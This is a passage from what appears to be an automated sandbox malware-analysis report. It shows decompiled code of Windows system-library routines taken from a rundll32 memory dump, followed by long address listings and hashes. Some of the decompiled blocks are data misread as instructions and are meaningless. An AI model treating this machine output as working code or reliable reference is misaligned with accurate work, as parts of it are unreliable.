									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t330 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M04602935))) {
							case 0:
								__ax =  *0x46c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t319 =  &_v64;
								_v80 = E04602E3E(0,  &_v64);
								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x46c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E045EEEF0(0x46c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E045EEB70(__ecx, 0x46c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t338;
												if(_t338 < 0) {
													L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x46c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E045EEB70(__ecx, 0x46c79a0);
										__eax = _v52;
										L36:
										_pop(_t331);
										_pop(_t339);
										__eflags = _v8 ^ _t343;
										_pop(_t290);
										return E0461B640(_t218, _t290, _v8 ^ _t343, _t319, _t331, _t339);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t319 =  &_v36;
									_t287 = E04602E3E(_t285,  &_v36);
									_t299 = _v36;
									_v76 = _t287;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0x46c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x46c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x46c6e58 & 0x0000ffff;
								__eax = ( *0x46c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t330 = _t330 + 1;
								if(_t330 >= _v48) {
									goto L16;
								} else {
									_t319 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					asm("pushad");
					_t244 = _t243 + 0x66;
					 *((intOrPtr*)(_t244 + 4)) =  *((intOrPtr*)(_t244 + 4)) - _t244;
					asm("loopne 0x29");
					asm("pushad");
					asm("pushad");
					_t246 = _t244 + 0x74;
					 *((intOrPtr*)(_t246 + 4)) =  *((intOrPtr*)(_t246 + 4)) - _t246;
					_t248 = _t246 + 0x1f0460ba;
					 *((intOrPtr*)(_t248 + 4)) =  *((intOrPtr*)(_t248 + 4)) - _t248;
					_t249 = _t248 ^ 0x0204645b;
					 *((intOrPtr*)(_t249 + 4)) =  *((intOrPtr*)(_t249 + 4)) - _t347;
					 *_t249 =  *_t249 - 0x60;
					asm("daa");
					asm("pushad");
					_t251 = _t249 + 0x114;
					 *((intOrPtr*)(_t251 + 4)) =  *((intOrPtr*)(_t251 + 4)) - _t251;
					_t340 = _t337 - 1;
					 *((intOrPtr*)(_t251 + 4)) =  *((intOrPtr*)(_t251 + 4)) - _t251;
					asm("daa");
					asm("pushad");
					_pop(_t295);
					 *((intOrPtr*)(_t251 + 0x190)) =  *((intOrPtr*)(_t251 + 0x190)) - _t251 + 0x18c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x46aff00);
					E0462D08C(_t295, _t332, _t340);
					_v44 =  *[fs:0x18];
					_t333 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t309 = _t260 * 0xc;
							_v48 = _t309;
							__eflags = _t296 -  *((intOrPtr*)(_t309 + 0x45b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E0461E5C0(_a8,  *((intOrPtr*)(_t309 + 0x45b1668)), _t296);
									_t347 = _t347 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t341 = E046551BE(_t296,  *((intOrPtr*)(_v48 + 0x45b166c)), _a16, _t333, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t305 = _a4;
								__eflags = _t305;
								if(_t305 != 0) {
									_v36 = _t305;
									__eflags =  *_t305 - _t333;
									if( *_t305 == _t333) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t321 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t321 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t305;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t305) {
											__eflags =  *(_t321 + 0x1c);
											if( *(_t321 + 0x1c) == 0) {
												L106:
												_t341 = E04602AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t333 = 1;
													_t305 = _v36;
													goto L75;
												}
											} else {
												_t265 = E045E6600( *(_t321 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t305 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E04602C50(_t305, _a8, _t296, _a16, _a20, _a24, _t333);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t272 = E04602AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E04602C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
									}
									_v8 = _t333;
									E04602ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t341;
					}
					L70:
					return E0462D0D1(_t258);
				}
				L108:
			}
























































                                                                                            0x04602584
                                                                                            0x04602586
                                                                                            0x04602590
                                                                                            0x04602596
                                                                                            0x04602597
                                                                                            0x04602598
                                                                                            0x04602599
                                                                                            0x0460259e
                                                                                            0x046025a4
                                                                                            0x046025a9
                                                                                            0x046025ac
                                                                                            0x046025ae
                                                                                            0x046025b1
                                                                                            0x046025b2
                                                                                            0x046025b5
                                                                                            0x046025b8
                                                                                            0x046025bb
                                                                                            0x046025bc
                                                                                            0x046025bf
                                                                                            0x046025c2
                                                                                            0x046025c5
                                                                                            0x046025c6
                                                                                            0x046025cb
                                                                                            0x046025ce
                                                                                            0x046025d8
                                                                                            0x046025db
                                                                                            0x046025dd
                                                                                            0x046025de
                                                                                            0x046025e1
                                                                                            0x046025e3
                                                                                            0x046025e9
                                                                                            0x046026da
                                                                                            0x046026da
                                                                                            0x046026dd
                                                                                            0x046026e2
                                                                                            0x04645b56
                                                                                            0x00000000
                                                                                            0x046026e8
                                                                                            0x046026f9
                                                                                            0x046026fb
                                                                                            0x046026fe
                                                                                            0x04602700
                                                                                            0x04645b60
                                                                                            0x00000000
                                                                                            0x04602706
                                                                                            0x04602706
                                                                                            0x0460270a
                                                                                            0x0460270a
                                                                                            0x0460270d
                                                                                            0x04602713
                                                                                            0x04602716
                                                                                            0x04602718
                                                                                            0x0460271c
                                                                                            0x0460271e
                                                                                            0x04645b6c
                                                                                            0x04645b6f
                                                                                            0x04645b7f
                                                                                            0x04645b89
                                                                                            0x04645b8e
                                                                                            0x04645b93
                                                                                            0x04645b96
                                                                                            0x04645b9c
                                                                                            0x04645ba0
                                                                                            0x04645ba3
                                                                                            0x04645bab
                                                                                            0x04645bb0
                                                                                            0x04645bb3
                                                                                            0x04645bb3
                                                                                            0x04645ba3
                                                                                            0x04602724
                                                                                            0x04602726
                                                                                            0x04602729
                                                                                            0x0460272c
                                                                                            0x0460279d
                                                                                            0x0460279d
                                                                                            0x046027a0
                                                                                            0x046027a2
                                                                                            0x00000000
                                                                                            0x0460272e
                                                                                            0x0460272e
                                                                                            0x04602731
                                                                                            0x04602734
                                                                                            0x04602734
                                                                                            0x04602736
                                                                                            0x04645bc1
                                                                                            0x04645bc1
                                                                                            0x04645bc4
                                                                                            0x00000000
                                                                                            0x04645bca
                                                                                            0x04645bca
                                                                                            0x04645bcd
                                                                                            0x00000000
                                                                                            0x04645bd3
                                                                                            0x00000000
                                                                                            0x04645bd3
                                                                                            0x04645bcd
                                                                                            0x0460273c
                                                                                            0x0460273c
                                                                                            0x04602742
                                                                                            0x04602747
                                                                                            0x0460274a
                                                                                            0x0460274d
                                                                                            0x04602750
                                                                                            0x00000000
                                                                                            0x04602756
                                                                                            0x04602756
                                                                                            0x00000000
                                                                                            0x04602902
                                                                                            0x04602908
                                                                                            0x0460290b
                                                                                            0x00000000
                                                                                            0x04602911
                                                                                            0x0460291c
                                                                                            0x04602921
                                                                                            0x00000000
                                                                                            0x04602921
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602880
                                                                                            0x04602887
                                                                                            0x0460288c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602805
                                                                                            0x0460280a
                                                                                            0x04602814
                                                                                            0x04602816
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460281e
                                                                                            0x04602821
                                                                                            0x04602823
                                                                                            0x00000000
                                                                                            0x04602829
                                                                                            0x04602829
                                                                                            0x04602831
                                                                                            0x0460283c
                                                                                            0x0460283e
                                                                                            0x00000000
                                                                                            0x0460283e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460284e
                                                                                            0x04602850
                                                                                            0x04602851
                                                                                            0x04602854
                                                                                            0x04602857
                                                                                            0x0460285a
                                                                                            0x0460285c
                                                                                            0x0460285d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460275d
                                                                                            0x04602761
                                                                                            0x00000000
                                                                                            0x04602767
                                                                                            0x0460276e
                                                                                            0x04602773
                                                                                            0x04602773
                                                                                            0x04602776
                                                                                            0x04602778
                                                                                            0x0460277e
                                                                                            0x0460277e
                                                                                            0x04602781
                                                                                            0x04602781
                                                                                            0x04602783
                                                                                            0x04602784
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645bd8
                                                                                            0x04645bde
                                                                                            0x04645be4
                                                                                            0x04645be6
                                                                                            0x04645be8
                                                                                            0x04645be9
                                                                                            0x04645bee
                                                                                            0x04645bf8
                                                                                            0x04645bff
                                                                                            0x04645c01
                                                                                            0x04645c04
                                                                                            0x04645c07
                                                                                            0x04645c0b
                                                                                            0x04645c0d
                                                                                            0x04645c0d
                                                                                            0x04645c15
                                                                                            0x04645c18
                                                                                            0x04645c1b
                                                                                            0x04645c1b
                                                                                            0x04645c1e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046028c3
                                                                                            0x046028c8
                                                                                            0x046028d2
                                                                                            0x046028d4
                                                                                            0x046028d8
                                                                                            0x046028db
                                                                                            0x04645c26
                                                                                            0x04645c28
                                                                                            0x04645c2d
                                                                                            0x04645c2d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645c34
                                                                                            0x04645c36
                                                                                            0x04645c49
                                                                                            0x04645c4e
                                                                                            0x04645c54
                                                                                            0x04645c5b
                                                                                            0x04645c5d
                                                                                            0x04645c60
                                                                                            0x04602788
                                                                                            0x04602788
                                                                                            0x0460278b
                                                                                            0x0460278e
                                                                                            0x0460278e
                                                                                            0x0460278e
                                                                                            0x04602791
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602756
                                                                                            0x04602750
                                                                                            0x00000000
                                                                                            0x04602794
                                                                                            0x04602794
                                                                                            0x04602795
                                                                                            0x04602798
                                                                                            0x04602798
                                                                                            0x00000000
                                                                                            0x04602734
                                                                                            0x0460272c
                                                                                            0x04602700
                                                                                            0x046025ef
                                                                                            0x046025ef
                                                                                            0x046025ef
                                                                                            0x046025f2
                                                                                            0x046025f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046025fe
                                                                                            0x00000000
                                                                                            0x046028e6
                                                                                            0x046028ec
                                                                                            0x046028ef
                                                                                            0x046028f5
                                                                                            0x046028f8
                                                                                            0x046028f8
                                                                                            0x00000000
                                                                                            0x046028f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602866
                                                                                            0x04602866
                                                                                            0x04602876
                                                                                            0x04602879
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046027e0
                                                                                            0x046027e7
                                                                                            0x046027e9
                                                                                            0x046027eb
                                                                                            0x04645afd
                                                                                            0x00000000
                                                                                            0x04645afd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602633
                                                                                            0x04602638
                                                                                            0x0460263b
                                                                                            0x0460263c
                                                                                            0x0460263e
                                                                                            0x04602640
                                                                                            0x04602642
                                                                                            0x04602647
                                                                                            0x04602649
                                                                                            0x0460264e
                                                                                            0x04602650
                                                                                            0x04602653
                                                                                            0x04602659
                                                                                            0x046026a2
                                                                                            0x046026a7
                                                                                            0x046026ac
                                                                                            0x046026b2
                                                                                            0x04645b11
                                                                                            0x04645b15
                                                                                            0x04645b17
                                                                                            0x00000000
                                                                                            0x046026b8
                                                                                            0x046026b8
                                                                                            0x046026ba
                                                                                            0x046027a6
                                                                                            0x046027a6
                                                                                            0x046027a9
                                                                                            0x046027ab
                                                                                            0x046027b9
                                                                                            0x046027b9
                                                                                            0x046027be
                                                                                            0x046027c1
                                                                                            0x046027c3
                                                                                            0x046027c5
                                                                                            0x046027c7
                                                                                            0x04645c74
                                                                                            0x04645c79
                                                                                            0x04645c79
                                                                                            0x046027c7
                                                                                            0x00000000
                                                                                            0x046026c0
                                                                                            0x046026c0
                                                                                            0x046026c3
                                                                                            0x046026c6
                                                                                            0x046026c6
                                                                                            0x046026c9
                                                                                            0x046026c9
                                                                                            0x00000000
                                                                                            0x046026c9
                                                                                            0x046026ba
                                                                                            0x0460265b
                                                                                            0x0460265b
                                                                                            0x0460265e
                                                                                            0x04602667
                                                                                            0x0460266d
                                                                                            0x04602677
                                                                                            0x0460267c
                                                                                            0x0460267f
                                                                                            0x04602681
                                                                                            0x04645b49
                                                                                            0x04645b4e
                                                                                            0x046027cd
                                                                                            0x046027d0
                                                                                            0x046027d1
                                                                                            0x046027d2
                                                                                            0x046027d4
                                                                                            0x046027dd
                                                                                            0x04602687
                                                                                            0x04602687
                                                                                            0x0460268a
                                                                                            0x0460268b
                                                                                            0x0460268e
                                                                                            0x0460268f
                                                                                            0x04602691
                                                                                            0x04602696
                                                                                            0x04602698
                                                                                            0x0460269d
                                                                                            0x0460269f
                                                                                            0x00000000
                                                                                            0x0460269f
                                                                                            0x04602681
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602846
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602605
                                                                                            0x0460260a
                                                                                            0x0460260c
                                                                                            0x04602611
                                                                                            0x04602616
                                                                                            0x04602619
                                                                                            0x04602619
                                                                                            0x0460261e
                                                                                            0x00000000
                                                                                            0x04602624
                                                                                            0x04602627
                                                                                            0x04602627
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645b1f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602894
                                                                                            0x0460289b
                                                                                            0x0460289d
                                                                                            0x046028a1
                                                                                            0x04645b2b
                                                                                            0x04645b2e
                                                                                            0x04645b2e
                                                                                            0x046028a7
                                                                                            0x046028a9
                                                                                            0x04645b04
                                                                                            0x04645b09
                                                                                            0x04645b09
                                                                                            0x04645b09
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645b35
                                                                                            0x04645b3c
                                                                                            0x046028fb
                                                                                            0x046028fb
                                                                                            0x046026cc
                                                                                            0x046026cc
                                                                                            0x046026d0
                                                                                            0x00000000
                                                                                            0x046026d2
                                                                                            0x046026d2
                                                                                            0x00000000
                                                                                            0x046026d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046025fe
                                                                                            0x0460292d
                                                                                            0x0460292d
                                                                                            0x04602930
                                                                                            0x04602935
                                                                                            0x04602937
                                                                                            0x04602938
                                                                                            0x0460293a
                                                                                            0x0460293d
                                                                                            0x0460293f
                                                                                            0x04602942
                                                                                            0x04602944
                                                                                            0x04602946
                                                                                            0x0460294f
                                                                                            0x04602952
                                                                                            0x04602955
                                                                                            0x0460295a
                                                                                            0x0460295d
                                                                                            0x04602962
                                                                                            0x04602963
                                                                                            0x04602964
                                                                                            0x04602966
                                                                                            0x04602969
                                                                                            0x0460296a
                                                                                            0x0460296e
                                                                                            0x0460296f
                                                                                            0x04602972
                                                                                            0x04602976
                                                                                            0x0460297e
                                                                                            0x0460297f
                                                                                            0x04602980
                                                                                            0x04602981
                                                                                            0x04602982
                                                                                            0x04602983
                                                                                            0x04602984
                                                                                            0x04602985
                                                                                            0x04602986
                                                                                            0x04602987
                                                                                            0x04602988
                                                                                            0x04602989
                                                                                            0x0460298a
                                                                                            0x0460298b
                                                                                            0x0460298c
                                                                                            0x0460298d
                                                                                            0x0460298e
                                                                                            0x0460298f
                                                                                            0x04602990
                                                                                            0x04602992
                                                                                            0x04602997
                                                                                            0x046029a3
                                                                                            0x046029a6
                                                                                            0x046029ab
                                                                                            0x046029ad
                                                                                            0x046029b0
                                                                                            0x046029b2
                                                                                            0x04645c80
                                                                                            0x046029b8
                                                                                            0x046029b8
                                                                                            0x046029bb
                                                                                            0x046029c0
                                                                                            0x046029c5
                                                                                            0x046029c6
                                                                                            0x046029c6
                                                                                            0x046029c9
                                                                                            0x046029cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046029cd
                                                                                            0x046029d0
                                                                                            0x046029d9
                                                                                            0x046029db
                                                                                            0x046029dd
                                                                                            0x04602a7f
                                                                                            0x04602a84
                                                                                            0x04602a87
                                                                                            0x04602a89
                                                                                            0x04645ca1
                                                                                            0x04645ca3
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029dd
                                                                                            0x00000000
                                                                                            0x046029db
                                                                                            0x046029e6
                                                                                            0x046029e9
                                                                                            0x046029eb
                                                                                            0x046029ed
                                                                                            0x046029f3
                                                                                            0x046029f5
                                                                                            0x046029f8
                                                                                            0x046029fa
                                                                                            0x04602a97
                                                                                            0x04602a9a
                                                                                            0x04602a9d
                                                                                            0x04602add
                                                                                            0x00000000
                                                                                            0x04602a9f
                                                                                            0x04602aa2
                                                                                            0x04602aa5
                                                                                            0x04602aa8
                                                                                            0x04602aab
                                                                                            0x04645cab
                                                                                            0x04645caf
                                                                                            0x04645cc5
                                                                                            0x04645cda
                                                                                            0x04645cdc
                                                                                            0x04645cdf
                                                                                            0x04645ce5
                                                                                            0x00000000
                                                                                            0x04645ceb
                                                                                            0x04645ced
                                                                                            0x04645cee
                                                                                            0x00000000
                                                                                            0x04645cee
                                                                                            0x04645cb1
                                                                                            0x04645cb4
                                                                                            0x04645cb9
                                                                                            0x04645cbb
                                                                                            0x00000000
                                                                                            0x04645cbd
                                                                                            0x04645cbd
                                                                                            0x00000000
                                                                                            0x04645cbd
                                                                                            0x04645cbb
                                                                                            0x04602ab1
                                                                                            0x04602ab1
                                                                                            0x04602ac4
                                                                                            0x04602ac6
                                                                                            0x04602ac6
                                                                                            0x00000000
                                                                                            0x04602ac6
                                                                                            0x04602aab
                                                                                            0x00000000
                                                                                            0x04602a00
                                                                                            0x04602a09
                                                                                            0x04602a0e
                                                                                            0x04602a21
                                                                                            0x04602a24
                                                                                            0x04602a35
                                                                                            0x04602a3a
                                                                                            0x04602a3d
                                                                                            0x04602a42
                                                                                            0x04602a59
                                                                                            0x04602a59
                                                                                            0x04602a5c
                                                                                            0x04602a5f
                                                                                            0x04602a5f
                                                                                            0x046029fa
                                                                                            0x046029f3
                                                                                            0x04602a64
                                                                                            0x04602a64
                                                                                            0x04602a6b
                                                                                            0x04602a6b
                                                                                            0x04602a6d
                                                                                            0x04602a72
                                                                                            0x04602a72
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PATH
                                                                                            • API String ID: 0-1036084923
                                                                                            • Opcode ID: 580bae1edd76f248b4251af525992758b19f4f95bb5683e39a196a0645b97f29
                                                                                            • Instruction ID: d06f979bce657fd55be0c8e9c201a566079d666c045c9cc10686b1cccadf550d
                                                                                            • Opcode Fuzzy Hash: 580bae1edd76f248b4251af525992758b19f4f95bb5683e39a196a0645b97f29
                                                                                            • Instruction Fuzzy Hash: E1C19071E10219DBDB28DF99D894ABEB7B5FF48704F148069E501AB290F734BD42CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E0460FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E045EEEF0(0x46c7b60);
					_t134 =  *0x46c7b84; // 0x77e07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x46c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x46c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E045E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E045E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04678938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E045DB150();
													}
													_t116 = E04676D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E045E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x46c8638; // 0x29ec1a8
																	_t122 = L045E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E045E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E045E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0460FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
